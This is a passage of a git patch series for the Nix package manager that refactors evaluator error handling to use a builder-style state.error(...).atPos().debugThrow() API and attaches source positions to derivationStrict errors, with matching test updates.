).atPos(pos).debugThrow(); } NixStringContext context2 { (NixStringContextElem { std::visit(overloaded { [&](const NixStringContextElem::Opaque & c) -> NixStringContextElem::DrvDeep { if (!c.path.isDerivation()) { - throw EvalError({ - .msg = hintfmt("path '%s' is not a derivation", - state.store->printStorePath(c.path)), - .errPos = state.positions[pos], - }); + state.error( + "path '%s' is not a derivation", + state.store->printStorePath(c.path) + ).atPos(pos).debugThrow(); } return NixStringContextElem::DrvDeep { .drvPath = c.path, }; }, [&](const NixStringContextElem::Built & c) -> NixStringContextElem::DrvDeep { - throw EvalError({ - .msg = hintfmt("`addDrvOutputDependencies` can only act on derivations, not on a derivation output such as '%1%'", c.output), - .errPos = state.positions[pos], - }); + state.error( + "`addDrvOutputDependencies` can only act on derivations, not on a derivation output such as '%1%'", + c.output + ).atPos(pos).debugThrow(); }, [&](const NixStringContextElem::DrvDeep & c) -> NixStringContextElem::DrvDeep { /* Reuse original item because we want this to be idempotent. */ @@ -261,10 +261,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar for (auto & i : *args[1]->attrs) { const auto & name = state.symbols[i.name]; if (!state.store->isStorePath(name)) - throw EvalError({ - .msg = hintfmt("context key '%s' is not a store path", name), - .errPos = state.positions[i.pos] - }); + state.error( + "context key '%s' is not a store path", + name + ).atPos(i.pos).debugThrow(); auto namePath = state.store->parseStorePath(name); if (!settings.readOnlyMode) state.store->ensurePath(namePath); @@ -281,10 +281,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar if (iter != i.value->attrs->end()) { if (state.forceBool(*iter->value, iter->pos, "while evaluating the `allOutputs` attribute of a string context")) { if (!isDerivation(name)) { - throw EvalError({ - .msg = hintfmt("tried to add all-outputs context of %s, which is not a derivation, to a string", name), - .errPos = state.positions[i.pos] - }); + state.error( + "tried to add all-outputs context of %s, which is not a derivation, to a string", + name + ).atPos(i.pos).debugThrow(); } context.emplace(NixStringContextElem::DrvDeep { .drvPath = namePath, @@ -296,10 +296,10 @@ static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * ar if (iter != i.value->attrs->end()) { state.forceList(*iter->value, iter->pos, "while evaluating the `outputs` attribute of a string context"); if (iter->value->listSize() && !isDerivation(name)) { - throw EvalError({ - .msg = hintfmt("tried to add derivation output context of %s, which is not a derivation, to a string", name), - .errPos = state.positions[i.pos] - }); + state.error( + "tried to add derivation output context of %s, which is not a derivation, to a string", + name + ).atPos(i.pos).debugThrow(); } for (auto elem : iter->value->listItems()) { auto outputName = state.forceStringNoCtx(*elem, iter->pos, "while evaluating an output name within a string context"); diff --git a/src/libexpr/primops/fetchClosure.cc b/src/libexpr/primops/fetchClosure.cc index 27147a5d1..5806b3ff9 100644 --- a/src/libexpr/primops/fetchClosure.cc +++ b/src/libexpr/primops/fetchClosure.cc @@ -27,7 +27,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath), state.store->printStorePath(*toPathMaybe)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); if (!toPathMaybe) throw Error({ @@ -36,7 +36,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor "Use this value for the 'toPath' attribute passed to 'fetchClosure'", state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -54,7 +54,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor "The 'toPath' value '%s' is input-addressed, so it can't possibly be the result of rewriting to a content-addressed path.\n\n" "Set 'toPath' to an empty string to make Nix report the correct content-addressed path.", state.store->printStorePath(toPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -80,7 +80,7 @@ static void runFetchClosureWithContentAddressedPath(EvalState & state, const Pos "to the 'fetchClosure' arguments.\n\n" "Note that to ensure authenticity input-addressed store paths, users must configure a trusted binary cache public key on their systems. This is not needed for content-addressed paths.", state.store->printStorePath(fromPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -103,7 +103,7 @@ static void runFetchClosureWithInputAddressedPath(EvalState & state, const PosId "The store object referred to by 'fromPath' at '%s' is not input-addressed, but 'inputAddressed' is set to 'true'.\n\n" "Remove the 'inputAddressed' attribute (it defaults to 'false') to expect 'fromPath' to be content-addressed", state.store->printStorePath(fromPath)), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } @@ -154,14 +154,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg else throw Error({ .msg = hintfmt("attribute '%s' isn't supported in call to 'fetchClosure'", attrName), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } if (!fromPath) throw Error({ .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); bool inputAddressed = inputAddressedMaybe.value_or(false); @@ -172,14 +172,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg .msg = hintfmt("attribute '%s' is set to true, but '%s' is also set. Please remove one of them", "inputAddressed", "toPath"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); } if (!fromStoreUrl) throw Error({ .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); auto parsedURL = parseURL(*fromStoreUrl); @@ -189,13 +189,13 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg !(getEnv("_NIX_IN_TEST").has_value() && parsedURL.scheme == "file")) throw Error({ .msg = hintfmt("'fetchClosure' only supports http:// and https:// stores"), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); if (!parsedURL.query.empty()) throw Error({ .msg = hintfmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), - .errPos = state.positions[pos] + .pos = state.positions[pos] }); auto fromStore = openStore(parsedURL.to_string()); diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc index 58fe6f173..bb029b5b3 100644 --- a/src/libexpr/primops/fetchMercurial.cc +++ b/src/libexpr/primops/fetchMercurial.cc @@ -38,17 +38,11 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the `name` attribute passed to builtins.fetchMercurial"); else - throw EvalError({ - .msg = hintfmt("unsupported argument '%s' to 'fetchMercurial'", state.symbols[attr.name]), - .errPos = state.positions[attr.pos] - }); + state.error("unsupported argument '%s' to 'fetchMercurial'", state.symbols[attr.name]).atPos(attr.pos).debugThrow(); } if (url.empty()) - throw EvalError({ - .msg = hintfmt("'url' argument required"), - .errPos = state.positions[pos] - }); + state.error("'url' argument required").atPos(pos).debugThrow(); } else url = state.coerceToString(pos, *args[0], context, diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index a943095bb..1997d5513 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -100,16 +100,14 @@ static void fetchTree( if (auto aType = args[0]->attrs->get(state.sType)) { if (type) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unexpected attribute 'type'"), - .errPos = state.positions[pos] - })); + state.error( + "unexpected attribute 'type'" + ).atPos(pos).debugThrow(); type = state.forceStringNoCtx(*aType->value, aType->pos, "while evaluating the `type` attribute passed to builtins.fetchTree"); } else if (!type) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("attribute 'type' is missing in call to 'fetchTree'"), - .errPos = state.positions[pos] - })); + state.error( + "attribute 'type' is missing in call to 'fetchTree'" + ).atPos(pos).debugThrow(); attrs.emplace("type", type.value()); @@ -132,8 +130,8 @@ static void fetchTree( attrs.emplace(state.symbols[attr.name], printValueAsJSON(state, true, *attr.value, pos, context).dump()); } else - state.debugThrowLastTrace(TypeError("fetchTree argument '%s' is %s while a string, Boolean or integer is expected", - state.symbols[attr.name], showType(*attr.value))); + state.error("fetchTree argument '%s' is %s while a string, Boolean or integer is expected", + state.symbols[attr.name], showType(*attr.value)).debugThrow(); } if (params.isFetchGit && !attrs.contains("exportIgnore") && (!attrs.contains("submodules") || !*fetchers::maybeGetBoolAttr(attrs, "submodules"))) { @@ -142,10 +140,9 @@ static void fetchTree( if (!params.allowNameArgument) if (auto nameIter = attrs.find("name"); nameIter != attrs.end()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("attribute 'name' isn’t supported in call to 'fetchTree'"), - .errPos = state.positions[pos] - })); + state.error( + "attribute 'name' isn’t supported in call to 'fetchTree'" + ).atPos(pos).debugThrow(); input = fetchers::Input::fromAttrs(std::move(attrs)); } else { @@ -163,10 +160,9 @@ static void fetchTree( input = fetchers::Input::fromAttrs(std::move(attrs)); } else { if (!experimentalFeatureSettings.isEnabled(Xp::Flakes)) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("passing a string argument to 'fetchTree' requires the 'flakes' experimental feature"), - .errPos = state.positions[pos] - })); + state.error( + "passing a string argument to 'fetchTree' requires the 'flakes' experimental feature" + ).atPos(pos).debugThrow(); input = fetchers::Input::fromURL(url); } } @@ -175,10 +171,14 @@ static void fetchTree( input = lookupInRegistries(state.store, input).first; if (evalSettings.pureEval && !input.isLocked()) { + auto fetcher = "fetchTree"; if (params.isFetchGit) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); - else - state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + fetcher = "fetchGit"; + + state.error( + "in pure evaluation mode, %s requires a locked input", + fetcher + ).atPos(pos).debugThrow(); } state.checkURI(input.toURLString()); @@ -432,17 +432,13 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v else if (n == "name") name = state.forceStringNoCtx(*attr.value, attr.pos, "while evaluating the name of the content we should fetch"); else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("unsupported argument '%s' to '%s'", n, who), - .errPos = state.positions[attr.pos] - })); + state.error("unsupported argument '%s' to '%s'", n, who) + .atPos(pos).debugThrow(); } if (!url) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("'url' argument required"), - .errPos = state.positions[pos] - })); + state.error( + "'url' argument required").atPos(pos).debugThrow(); } else url = state.forceStringNoCtx(*args[0], pos, "while evaluating the url we should fetch"); @@ -455,7 +451,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v name = baseNameOf(*url); if (evalSettings.pureEval && !expectedHash) - state.debugThrowLastTrace(EvalError("in pure evaluation mode, '%s' requires a 'sha256' argument", who)); + state.error("in pure evaluation mode, '%s' requires a 'sha256' argument", who).atPos(pos).debugThrow(); // early exit if pinned and already in the store if (expectedHash && expectedHash->algo == HashAlgorithm::SHA256) { @@ -484,9 +480,15 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v auto hash = unpack ? state.store->queryPathInfo(storePath)->narHash : hashFile(HashAlgorithm::SHA256, state.store->toRealPath(storePath)); - if (hash != *expectedHash) - state.debugThrowLastTrace(EvalError((unsigned int) 102, "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", - *url, expectedHash->to_string(HashFormat::Nix32, true), hash.to_string(HashFormat::Nix32, true))); + if (hash != *expectedHash) { + state.error( + "hash mismatch in file downloaded from '%s':\n specified: %s\n got: %s", + *url, + expectedHash->to_string(HashFormat::Nix32, true), + hash.to_string(HashFormat::Nix32, true) + ).withExitStatus(102) + .debugThrow(); + } } state.allowAndSetStorePathString(storePath, v); diff --git a/src/libexpr/primops/fromTOML.cc b/src/libexpr/primops/fromTOML.cc index 2f4d4022e..94be7960a 100644 --- a/src/libexpr/primops/fromTOML.cc +++ b/src/libexpr/primops/fromTOML.cc @@ -83,10 +83,7 @@ static void prim_fromTOML(EvalState & state, const PosIdx pos, Value * * args, V try { visit(val, toml::parse(tomlStream, "fromTOML" /* the "filename" */)); } catch (std::exception & e) { // TODO: toml::syntax_error - throw EvalError({ - .msg = hintfmt("while parsing a TOML string: %s", e.what()), - .errPos = state.positions[pos] - }); + state.error("while parsing TOML: %s", e.what()).atPos(pos).debugThrow(); } } diff --git a/src/libexpr/value-to-json.cc b/src/libexpr/value-to-json.cc index 74b3ebf13..b2f116390 100644 --- a/src/libexpr/value-to-json.cc +++ b/src/libexpr/value-to-json.cc @@ -80,7 +80,7 @@ json printValueAsJSON(EvalState & state, bool strict, try { out.push_back(printValueAsJSON(state, strict, *elem, pos, context, copyToStore)); } catch (Error & e) { - e.addTrace({}, + e.addTrace(state.positions[pos], hintfmt("while evaluating list element at index %1%", i)); throw; } @@ -99,13 +99,12 @@ json printValueAsJSON(EvalState & state, bool strict, case nThunk: case nFunction: - auto e = TypeError({ - .msg = hintfmt("cannot convert %1% to JSON", showType(v)), - .errPos = state.positions[v.determinePos(pos)] - }); - e.addTrace(state.positions[pos], hintfmt("message for the trace")); - state.debugThrowLastTrace(e); - throw e; + state.error( + "cannot convert %1% to JSON", + showType(v) + ) + .atPos(v.determinePos(pos)) + .debugThrow(); } return out; } @@ -119,7 +118,8 @@ void printValueAsJSON(EvalState & state, bool strict, json ExternalValueBase::printValueAsJSON(EvalState & state, bool strict, NixStringContext & context, bool copyToStore) const { - state.debugThrowLastTrace(TypeError("cannot convert %1% to JSON", showType())); + state.error("cannot convert %1% to JSON", showType()) + .debugThrow(); } diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh index 214d52271..e7aea4949 100644 --- a/src/libexpr/value.hh +++ b/src/libexpr/value.hh @@ -105,7 +105,7 @@ class ExternalValueBase * Coerce the value to a string. Defaults to uncoercable, i.e. throws an * error. */ - virtual std::string coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const; + virtual std::string coerceToString(EvalState & state, const PosIdx & pos, NixStringContext & context, bool copyMore, bool copyToStore) const; /** * Compare to another value of the same type. Defaults to uncomparable, diff --git a/src/libmain/shared.cc b/src/libmain/shared.cc index 862ef355b..7b9b3c5b5 100644 --- a/src/libmain/shared.cc +++ b/src/libmain/shared.cc @@ -340,7 +340,7 @@ int handleExceptions(const std::string & programName, std::function fun) return 1; } catch (BaseError & e) { logError(e.info()); - return e.status; + return e.info().status; } catch (std::bad_alloc & e) { printError(error + "out of memory"); return 1; diff --git a/src/libstore/build/entry-points.cc b/src/libstore/build/entry-points.cc index 7f0a05d5d..d4bead28e 100644 --- a/src/libstore/build/entry-points.cc +++ b/src/libstore/build/entry-points.cc @@ -33,7 +33,7 @@ void Store::buildPaths(const std::vector & reqs, BuildMode buildMod } if (failed.size() == 1 && ex) { - ex->status = worker.failingExitStatus(); + ex->withExitStatus(worker.failingExitStatus()); throw std::move(*ex); } else if (!failed.empty()) { if (ex) logError(ex->info()); @@ -104,7 +104,7 @@ void Store::ensurePath(const StorePath & path) if (goal->exitCode != Goal::ecSuccess) { if (goal->ex) { - goal->ex->status = worker.failingExitStatus(); + goal->ex->withExitStatus(worker.failingExitStatus()); throw std::move(*goal->ex); } else throw Error(worker.failingExitStatus(), "path '%s' does not exist and cannot be created", printStorePath(path)); diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 27ad14ed4..8db93fa39 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -119,7 +119,7 @@ struct TunnelLogger : public Logger if (GET_PROTOCOL_MINOR(clientVersion) >= 26) { to << STDERR_ERROR << *ex; } else { - to << STDERR_ERROR << ex->what() << ex->status; + to << STDERR_ERROR << ex->what() << ex->info().status; } } } diff --git a/src/libutil/error.cc b/src/libutil/error.cc index 1f0cb08c9..e4e50d73b 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -335,7 +335,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * try { * e->eval(*this, env, v); * if (v.type() != nAttrs) - * throwTypeError("expected a set but found %1%", v); + * error("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -349,7 +349,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * e->eval(*this, env, v); * try { * if (v.type() != nAttrs) - * throwTypeError("expected a set but found %1%", v); + * error("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -411,7 +411,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s oss << einfo.msg << "\n"; - printPosMaybe(oss, "", einfo.errPos); + printPosMaybe(oss, "", einfo.pos); auto suggestions = einfo.suggestions.trim(); if (!suggestions.suggestions.empty()) { diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 764fac1ce..9f9302020 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -84,9 +84,14 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; hintformat msg; - std::shared_ptr errPos; + std::shared_ptr pos; std::list traces; + /** + * Exit status. + */ + unsigned int status = 1; + Suggestions suggestions; static std::optional programName; @@ -103,18 +108,21 @@ class BaseError : public std::exception protected: mutable ErrorInfo err; + /** + * Cached formatted contents of `err.msg`. + */ mutable std::optional what_; + /** + * Format `err.msg` and set `what_` to the resulting value. + */ const std::string & calcWhat() const; public: - unsigned int status = 1; // exit status - BaseError(const BaseError &) = default; template BaseError(unsigned int status, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(args...) } - , status(status) + : err { .level = lvlError, .msg = hintfmt(args...), .status = status } { } template @@ -149,6 +157,15 @@ public: const std::string & msg() const { return calcWhat(); } const ErrorInfo & info() const { calcWhat(); return err; } + void withExitStatus(unsigned int status) + { + err.status = status; + } + + void atPos(std::shared_ptr pos) { + err.pos = pos; + } + void pushTrace(Trace trace) { err.traces.push_front(trace); diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index d68ddacc0..89fbd194a 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -199,7 +199,7 @@ struct JSONLogger : Logger { json["level"] = ei.level; json["msg"] = oss.str(); json["raw_msg"] = ei.msg.str(); - to_json(json, ei.errPos); + to_json(json, ei.pos); if (loggerSettings.showTrace.get() && !ei.traces.empty()) { nlohmann::json traces = nlohmann::json::array(); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 40378e123..017818ed5 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -950,8 +950,8 @@ static void opServe(Strings opFlags, Strings opArgs) store->buildPaths(toDerivedPaths(paths)); out << 0; } catch (Error & e) { - assert(e.status); - out << e.status << e.msg(); + assert(e.info().status); + out << e.info().status << e.msg(); } break; } diff --git a/src/nix/eval.cc b/src/nix/eval.cc index a89fa7412..2e0837c8e 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -104,7 +104,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption } } else - throw TypeError("value at '%s' is not a string or an attribute set", state->positions[pos]); + state->error("value at '%s' is not a string or an attribute set", state->positions[pos]).debugThrow(); }; recurse(*v, pos, *writeTo); diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 0e34bd76a..646e4c831 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -848,10 +848,10 @@ struct CmdFlakeInitCommon : virtual Args, EvalCommand auto templateDir = templateDirAttr->getString(); if (!store->isInStore(templateDir)) - throw TypeError( + evalState->error( "'%s' was not found in the Nix store\n" "If you've set '%s' to a string, try using a path instead.", - templateDir, templateDirAttr->getAttrPathStr()); + templateDir, templateDirAttr->getAttrPathStr()).debugThrow(); std::vector changedFiles; std::vector conflictedFiles; @@ -1321,7 +1321,7 @@ struct CmdFlakeShow : FlakeCommand, MixJSON { auto aType = visitor.maybeGetAttr("type"); if (!aType || aType->getString() != "app") - throw EvalError("not an app definition"); + state->error("not an app definition").debugThrow(); if (json) { j.emplace("type", "app"); } else { diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh index c6a482035..ea90f8ebe 100644 --- a/tests/functional/fetchGit.sh +++ b/tests/functional/fetchGit.sh @@ -67,7 +67,7 @@ path2=$(nix eval --raw --expr "(builtins.fetchGit { url = file://$repo; rev = \" [[ $(nix eval --raw --expr "builtins.readFile (fetchGit { url = file://$repo; rev = \"$rev2\"; } + \"/hello\")") = world ]] # But without a hash, it fails -expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "'fetchGit' requires a locked input" +expectStderr 1 nix eval --expr 'builtins.fetchGit "file:///foo"' | grepQuiet "fetchGit requires a locked input" # Fetch again. This should be cached. mv $repo ${repo}-tmp @@ -208,7 +208,7 @@ path6=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; ur [[ $path3 = $path6 ]] [[ $(nix eval --impure --expr "(builtins.fetchTree { type = \"git\"; url = \"file://$TEST_ROOT/shallow\"; ref = \"dev\"; shallow = true; }).revCount or 123") == 123 ]] -expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "'fetchTree' requires a locked input" +expectStderr 1 nix eval --expr 'builtins.fetchTree { type = "git"; url = "file:///foo"; }' | grepQuiet "fetchTree requires a locked input" # Explicit ref = "HEAD" should work, and produce the same outPath as without ref path7=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = \"file://$repo\"; ref = \"HEAD\"; }).outPath") diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index c8d56ba7d..6848a35ed 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -14,3 +14,8 @@ error: 8| error: expected a string but found an integer: 1 + at /pwd/lang/eval-fail-attr-name-type.nix:7:17: + 6| in + 7| attrs.puppy.${key} + | ^ + 8| diff --git a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp index 73f9df8cc..9bbb251e1 100644 --- a/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp +++ b/tests/functional/lang/eval-fail-fromTOML-timestamps.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| key = "value" - error: while parsing a TOML string: Dates and times are not supported + error: while parsing TOML: Dates and times are not supported diff --git a/tests/functional/lang/eval-fail-toJSON.err.exp b/tests/functional/lang/eval-fail-toJSON.err.exp index 4f6003437..ad267711b 100644 --- a/tests/functional/lang/eval-fail-toJSON.err.exp +++ b/tests/functional/lang/eval-fail-toJSON.err.exp @@ -20,6 +20,11 @@ error: 3| true … while evaluating list element at index 3 + at /pwd/lang/eval-fail-toJSON.nix:2:3: + 1| builtins.toJSON { + 2| a.b = [ + | ^ + 3| true … while evaluating attribute 'c' at /pwd/lang/eval-fail-toJSON.nix:7:7: diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 94784c651..4326c9650 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -7,3 +7,8 @@ error: 6| error: expected a string but found a set: { } + at /pwd/lang/eval-fail-using-set-as-attr-name.nix:5:10: + 4| in + 5| attr.${key} + | ^ + 6| diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 5fca79304..d0d7ca79c 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -12,33 +12,33 @@ namespace nix { TEST_F(ErrorTraceTest, TraceBuilder) { ASSERT_THROW( - state.error("Not much").debugThrow(), + state.error("puppy").debugThrow(), EvalError ); ASSERT_THROW( - state.error("Not much").withTrace(noPos, "No more").debugThrow(), + state.error("puppy").withTrace(noPos, "doggy").debugThrow(), EvalError ); ASSERT_THROW( try { try { - state.error("Not much").withTrace(noPos, "No more").debugThrow(); + state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (Error & e) { - e.addTrace(state.positions[noPos], "Something", ""); + e.addTrace(state.positions[noPos], "beans", ""); throw; } } catch (BaseError & e) { ASSERT_EQ(PrintToString(e.info().msg), - PrintToString(hintfmt("Not much"))); + PrintToString(hintfmt("puppy"))); auto trace = e.info().traces.rbegin(); ASSERT_EQ(e.info().traces.size(), 2); ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("No more"))); + PrintToString(hintfmt("doggy"))); trace++; ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("Something"))); + PrintToString(hintfmt("beans"))); throw; } , EvalError @@ -47,12 +47,12 @@ namespace nix { TEST_F(ErrorTraceTest, NestedThrows) { try { - state.error("Not much").withTrace(noPos, "No more").debugThrow(); + state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (BaseError & e) { try { - state.error("Not much more").debugThrow(); + state.error("beans").debugThrow(); } catch (Error & e2) { - e.addTrace(state.positions[noPos], "Something", ""); + e.addTrace(state.positions[noPos], "beans2", ""); //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); From 87dc4bc7d139a7eccb257e71558314a0d99e8d6a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:08:06 -0800 Subject: [PATCH 378/654] Attach positions to errors in `derivationStrict` --- src/libexpr/primops.cc | 33 +++++++++++++++++---------------- 1 file changed, 17 insertions(+), 16 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1eec6f961..69f89e0e0 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1085,9 +1085,10 @@ drvName, Bindings * attrs, Value & v) /* Check whether attributes should be passed as a JSON file. */ using nlohmann::json; std::optional jsonObject; + auto pos = v.determinePos(noPos); auto attr = attrs->find(state.sStructuredAttrs); if (attr != attrs->end() && - state.forceBool(*attr->value, noPos, + state.forceBool(*attr->value, pos, "while evaluating the `__structuredAttrs` " "attribute passed to builtins.derivationStrict")) jsonObject = json::object(); @@ -1096,7 +1097,7 @@ drvName, Bindings * attrs, Value & v) bool ignoreNulls = false; attr = attrs->find(state.sIgnoreNulls); if (attr != attrs->end()) - ignoreNulls = state.forceBool(*attr->value, noPos, "while evaluating the `__ignoreNulls` attribute " "passed to builtins.derivationStrict"); + ignoreNulls = state.forceBool(*attr->value, pos, "while evaluating the `__ignoreNulls` attribute " "passed to builtins.derivationStrict"); /* Build the derivation expression by processing the attributes. */ Derivation drv; @@ -1160,16 +1161,16 @@ drvName, Bindings * attrs, Value & v) const std::string_view context_below(""); if (ignoreNulls) { - state.forceValue(*i->value, noPos); + state.forceValue(*i->value, pos); if (i->value->type() == nNull) continue; } - if (i->name == state.sContentAddressed && state.forceBool(*i->value, noPos, context_below)) { + if (i->name == state.sContentAddressed && state.forceBool(*i->value, pos, context_below)) { contentAddressed = true; experimentalFeatureSettings.require(Xp::CaDerivations); } - else if (i->name == state.sImpure && state.forceBool(*i->value, noPos, context_below)) { + else if (i->name == state.sImpure && state.forceBool(*i->value, pos, context_below)) { isImpure = true; experimentalFeatureSettings.require(Xp::ImpureDerivations); } @@ -1177,9 +1178,9 @@ drvName, Bindings * attrs, Value & v) /* The `args' attribute is special: it supplies the command-line arguments to the builder. */ else if (i->name == state.sArgs) { - state.forceList(*i->value, noPos, context_below); + state.forceList(*i->value, pos, context_below); for (auto elem : i->value->listItems()) { - auto s = state.coerceToString(noPos, *elem, context, + auto s = state.coerceToString(pos, *elem, context, "while evaluating an element of the argument list", true).toOwned(); drv.args.push_back(s); @@ -1194,29 +1195,29 @@ drvName, Bindings * attrs, Value & v) if (i->name == state.sStructuredAttrs) continue; - (*jsonObject)[key] = printValueAsJSON(state, true, *i->value, noPos, context); + (*jsonObject)[key] = printValueAsJSON(state, true, *i->value, pos, context); if (i->name == state.sBuilder) - drv.builder = state.forceString(*i->value, context, noPos, context_below); + drv.builder = state.forceString(*i->value, context, pos, context_below); else if (i->name == state.sSystem) - drv.platform = state.forceStringNoCtx(*i->value, noPos, context_below); + drv.platform = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHash) - outputHash = state.forceStringNoCtx(*i->value, noPos, context_below); + outputHash = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHashAlgo) - outputHashAlgo = state.forceStringNoCtx(*i->value, noPos, context_below); + outputHashAlgo = state.forceStringNoCtx(*i->value, pos, context_below); else if (i->name == state.sOutputHashMode) - handleHashMode(state.forceStringNoCtx(*i->value, noPos, context_below)); + handleHashMode(state.forceStringNoCtx(*i->value, pos, context_below)); else if (i->name == state.sOutputs) { /* Require ‘outputs’ to be a list of strings. */ - state.forceList(*i->value, noPos, context_below); + state.forceList(*i->value, pos, context_below); Strings ss; for (auto elem : i->value->listItems()) - ss.emplace_back(state.forceStringNoCtx(*elem, noPos, context_below)); + ss.emplace_back(state.forceStringNoCtx(*elem, pos, context_below)); handleOutputs(ss); } } else { - auto s = state.coerceToString(noPos, *i->value, context, context_below, true).toOwned(); + auto s = state.coerceToString(pos, *i->value, context, context_below, true).toOwned(); drv.env.emplace(key, s); if (i->name == state.sBuilder) drv.builder = std::move(s); else if (i->name == state.sSystem) drv.platform = std::move(s); From faaccecbc82d98288582bdc8ca96991796561371 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 1 Feb 2024 13:08:19 -0800 Subject: [PATCH 379/654] Remove `EXCEPTION_NEEDS_THROW_SPEC` We're on C++ 20 now, we don't need this --- src/libutil/error.hh 